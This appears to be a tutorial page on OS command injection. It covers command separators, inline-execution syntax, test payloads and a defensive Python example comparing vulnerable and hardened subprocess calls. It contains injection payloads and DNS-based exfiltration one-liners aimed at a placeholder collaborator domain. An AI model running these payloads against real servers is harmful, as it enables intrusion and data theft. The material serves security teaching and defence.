# OS command injection

## Introduction

OS command injection is an attack in which an attacker executes arbitrary commands on the operating system of the server running the application, often compromising the application and its data.

The attack is possible when an application passes unsafe user input (form fields, cookies, HTTP headers, etc.) into a system shell without proper validation. The injected commands run with the privileges of the vulnerable application, so the impact depends on what that account is allowed to do.

## Useful commands

| Purpose of command    | Linux                                   | Windows                                                                            |
| --------------------- | --------------------------------------- | ---------------------------------------------------------------------------------- |
| Name of current user  | `whoami`                                | `whoami`                                                                           |
| Operating system      | `uname -a`                              | `ver`                                                                              |
| Network configuration | `ifconfig`                              | `ipconfig /all`                                                                    |
| Network connections   | `netstat -an`                           | `netstat -an`                                                                      |
| Running processes     | `ps -ef`                                | `tasklist`                                                                         |
| Exfiltrate data       | `nslookup $(<COMMAND>).<COLLAB_DOMAIN>` | ``for /F "usebackq delims=" %A in (`<COMMAND>`) do nslookup %A.<COLLAB_DOMAIN>`` |

## Ways of injecting OS commands

Several characters work as command separators, allowing commands to be chained together. The following command separators work on both **Windows** and **Unix**-based systems:

```bash
&
&&
|
||
```

The following command separators work only on **Unix**-based systems:

```bash
;
# Newline character (0x0a, written \n)
```

On **Unix**-based systems, you can also use backticks or `$()` to perform inline execution of an injected command within the original command:

```bash
`<COMMAND>`
$(<COMMAND>)
```

To test for this, send the following payload when the command's output is returned in the response:

```bash
; echo HELLO #
```

If the command's result is not shown in the response, try the following out-of-band check instead and watch for the lookup on your collaborator domain:

```bash
; ping <COLLAB_DOMAIN>
```
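As an added illustration from the defender's side (not code from the original page), here is a Python handler that builds a shell string from a hostname, beside a hardened version. `echo` stands in for the real tool (e.g. `nslookup`) so the example runs offline, and the hostname allowlist is an assumed policy for this example.

```python
import re
import subprocess

# Constructed sample inputs: a Unix separator and an inline-execution payload.
SEPARATOR_HOST = "example.com; echo INJECTED"
INLINE_HOST = "$(echo INJECTED)"

# Assumed allowlist: DNS-style labels only, no shell metacharacters.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9-]{1,63}(\.[A-Za-z0-9-]{1,63})*")


def lookup_vulnerable(host: str) -> str:
    """Vulnerable pattern: user input is concatenated into a command string
    and handed to /bin/sh via shell=True, so ';' ends the intended command
    and '$()' runs whatever is inside it."""
    result = subprocess.run(f"echo {host}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def validate_hostname(host: str) -> bool:
    """First layer: reject anything that is not a plain hostname."""
    return HOSTNAME_RE.fullmatch(host) is not None


def run_without_shell(host: str) -> str:
    """Second layer: pass the value as one argv element with no shell, so
    separators and $() are ordinary characters in a single argument."""
    result = subprocess.run(["echo", host], shell=False,
                            capture_output=True, text=True)
    return result.stdout


def lookup_hardened(host: str) -> str:
    """Hardened handler: allowlist validation, then argv-style invocation."""
    if not validate_hostname(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return run_without_shell(host)


def separators_reached_shell(host: str) -> bool:
    """True when the vulnerable path executed more than the intended command."""
    return "INJECTED" in lookup_vulnerable(host).splitlines()
```

Both layers are worth keeping: the allowlist stops the payload at the boundary, and the argv form ensures that even an input that slips past validation never reaches a shell parser.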

## References

* [OS command injection \[PortSwigger\]](https://portswigger.net/web-security/os-command-injection)
* [Command Injection \[OWASP\]](https://owasp.org/www-community/attacks/Command_Injection)
